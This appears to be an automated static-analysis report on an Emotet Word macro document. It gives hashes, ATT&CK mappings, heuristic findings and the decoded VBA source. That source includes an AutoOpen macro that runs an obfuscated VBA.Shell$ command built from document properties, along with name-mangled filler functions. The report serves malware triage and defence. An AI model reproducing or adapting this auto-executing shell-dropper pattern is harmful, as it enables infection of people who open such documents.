Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 a2fe92fa39d6b0f9…

MALICIOUS

Office (OLE)

63.5 KB Created: 2017-09-19 20:21:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: aa89188c9d784ef7777411a60014a3a9 SHA-1: f3dfc70ef70ae97b7a4fac56e9daac7c82321b0a SHA-256: a2fe92fa39d6b0f9dbfebd83be179524fadb87b11e555eee96c606af7d34ce73
172 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6344335-3, indicating it is likely part of the Emotet botnet. Static analysis reveals the presence of VBA macros, including an AutoOpen macro, and a critical heuristic firing for a potential Shell call. The VBA script itself is heavily obfuscated, but its structure and the heuristic firings suggest it is designed to download and execute a secondary payload. The presence of the 'macros.bas' file further supports this.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Function wmLBTdd()
VBA.Shell$ "" + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.CustomDocumentProperties("xVaRBHEx") + ActiveDocument.CustomDocumentProperties("zLnUYyAY") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.BuiltInDocumentProperties("Comments") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + MxttMnex, 0
End Function
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
wmLBTdd
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4506 bytes
SHA-256: 951bf33fec7c5ad820b90c015c6088280fd8cd800a641440b0314efc74e0418e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
85 of 114 identifiers look randomly generated (e.g. 'zCFWChLpvnu') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Public Function FwZAgpSHcGg() As Integer
FzKGWXrr = 4971
aHyNTSGpN = KSWnTMHbt
EufBaDTKvYx = Asc(aHyNTSGpN)
If FzKGWXrr > EufBaDTKvYx Then
    For SKzFdaV = 1933 To 4203
       SRxyxsZ = EufBaDTKvYx + SKzFdaV
    Next SKzFdaV
SRxyxsZ = SRxyxsZ + FzKGWXrr
FBgYkSaakT = CStr(SRxyxsZ)
SXTcfFuaf = Mid(FBgYkSaakT, 1650, 5699)
dXvyZsw = dXvyZsw & "3196"
FwZAgpSHcGg = CInt(Mid(dXvyZsw, 3260, 3559))
Else
FwZAgpSHcGg = 401 + 2793 + 3500 / 4838 / 3564 / 128 - 7739 - 5979 - 6617 + 1223 + 3619 + 7300
MsgBox ("YyMCEyD")

End Function
 
Public Function FUdZfmbaNZ() As Integer
xbysxZkZWg = 2990
xxGEaNh = YUvXXpc
tFPNTZWwfwC = Asc(xxGEaNh)
If xbysxZkZWg > tFPNTZWwfwC Then
    For zVADYWKyb = 1248 To 5926
       TFbxbZsyD = tFPNTZWwfwC + zVADYWKyb
    Next zVADYWKyb
TFbxbZsyD = TFbxbZsyD + xbysxZkZWg
ewLcmTFvkv = CStr(TFbxbZsyD)
NaTdrew = Mid(ewLcmTFvkv, 3133, 9241)
YXmDESyZ = YXmDESyZ & "1754"
FUdZfmbaNZ = CInt(Mid(YXmDESyZ, 2992, 7129))
Else
FUdZfmbaNZ = 6493 + 1685 + 5730 + 5879 / 2370 / 939 - 5177 - 4144 - 6673 + 3728 + 9324 + 5645
MsgBox ("FYYptmBaYc")
 MsgBox ("ASxsHWVw")
 MsgBox ("ChukvHuwR")

End Function
 
Public Function MumrSNXBAKT() As Integer
wbLuEkhTfCS = 1902
umZsXzmE = bFdWhpuu
pPbFmsy = Asc(umZsXzmE)
If wbLuEkhTfCS > pPbFmsy Then
    For LgNKhzzn = 1374 To 6456
       AGPVMppn = pPbFmsy + LgNKhzzn
    Next LgNKhzzn
AGPVMppn = AGPVMppn + wbLuEkhTfCS
hkZDnYyC = CStr(AGPVMppn)
sLYAGFRSdU = Mid(hkZDnYyC, 69, 8327)
fbwGraDfWvb = fbwGraDfWvb & "6898"
MumrSNXBAKT = CInt(Mid(fbwGraDfWvb, 3129, 5083))
Else
MumrSNXBAKT = 1451 + 9244 + 938 + 3011 / 7208 / 4282 - 9340 - 1631 + 4616 + 9163 + 5242
MsgBox ("xvtezsHkH")
 MsgBox ("mDBykBEKHZ")

End Function

Sub autoopen()
wmLBTdd
End Sub
Public Function wmLBTdd()
VBA.Shell$ "" + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.CustomDocumentProperties("xVaRBHEx") + ActiveDocument.CustomDocumentProperties("zLnUYyAY") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + ActiveDocument.BuiltInDocumentProperties("Comments") + bBMgBTW + WkRabYhn + fcZcwsL + GxREutDWt + dSgDrAWffZC + ANsdRyHYgN + MxttMnex, 0
End Function

Public Function SgwMWHLWCC() As Integer
tgsUMeZsX = 1803
LpvLKZXfn = hspDnpCsw
kUbuagM = Asc(LpvLKZXfn)
If tgsUMeZsX > kUbuagM Then
    For gerZDuDRAVd = 1987 To 7221
       rbbZhXRVSK = kUbuagM + gerZDuDRAVd
    Next gerZDuDRAVd
rbbZhXRVSK = rbbZhXRVSK + tgsUMeZsX
xxWSfhM = CStr(rbbZhXRVSK)
zCFWChLpvnu = Mid(xxWSfhM, 3382, 6652)
BrCvYWre = BrCvYWre & "6097"
SgwMWHLWCC = CInt(Mid(BrCvYWre, 2692, 3746))
Else
SgwMWHLWCC = 2437 + 3173 + 8806 / 8080 / 5710 / 1565 - 4967 - 3976 + 3744 + 4892
MsgBox ("thyxnDmtEM")
 MsgBox ("yWSMxava")
 MsgBox ("DUvVybrbVh")
 MsgBox ("kDcAHpZcFmL")
 MsgBox ("GLppftMdg")

End Function
 
Public Function greZaumUXAD() As Integer
gWvZpuFA = 5106
AdHcDaXrU = bZEnSrgGRM
cghLTWnhFWb = Asc(AdHcDaXrU)
If gWvZpuFA > cghLTWnhFWb Then
    For NrFtuhfMv = 1981 To 3435
       PEWKkgUtWu = cghLTWnhFWb + NrFtuhfMv
    Next NrFtuhfMv
PEWKkgUtWu = PEWKkgUtWu + gWvZpuFA
yhWRHBDgCR = CStr(PEWKkgUtWu)
xTkNmXDn = Mid(yhWRHBDgCR, 2004, 6795)
ZdCuVgNmCh = ZdCuVgNmCh & "9595"
greZaumUXAD = CInt(Mid(ZdCuVgNmCh, 850, 5993))
Else
greZaumUXAD = 175 + 5287 + 4613 + 1463 / 5030 / 434 - 6249 - 1028 - 1828 + 1963 + 1892
MsgBox ("AuGYrZr")
 MsgBox ("KXFDyCke")
 MsgBox ("skyzFRDL")
 MsgBox ("SYYkULMSFg")
 MsgBox ("EUrZtKY")

End Function
 
Public Function SxWPsmKy() As Integer
AGreHaMNX = 2348
BNEZvPeX = CYynzWA
sxgezFrwhxY = Asc(BNEZvPeX)
If AGreHaMNX > sxgezFrwhxY Then
    For PCaDdyDmVRZ = 529 To 9239
       WpNBuNcvWgY = sxgezFrwhxY + PCaDdyDmVRZ
    Next PCaDdyDmVRZ
WpNBuNcvWgY = WpNBuNcvWgY + AGreHaMNX
fpKcwtByAy = CStr(WpNBuNcvWgY)
cnzbftMBZk = Mid(fpKcwtByAy, 1078, 5847)
DPVVbHrW = DPVVbHrW & "3988"
SxWPsmKy = CInt(Mid(DPVVbHrW, 2781, 8234))
Else
SxWPsmKy = 906 + 451 + 1341 + 6534 / 6830 / 9368 / 8717 - 4565 - 5470 - 4918 + 3383 + 4193
MsgBox ("wFTaWgCCX")
 MsgBox ("GXRUKFH")
 MsgBox ("CXxWnXaW")
 MsgBox ("PAnYeXApE")
 MsgBox ("mvHpSrLMT")
 MsgBox ("xsYTcyGB")

End Function

Open this report in the interactive analyzer, or submit your own file for analysis.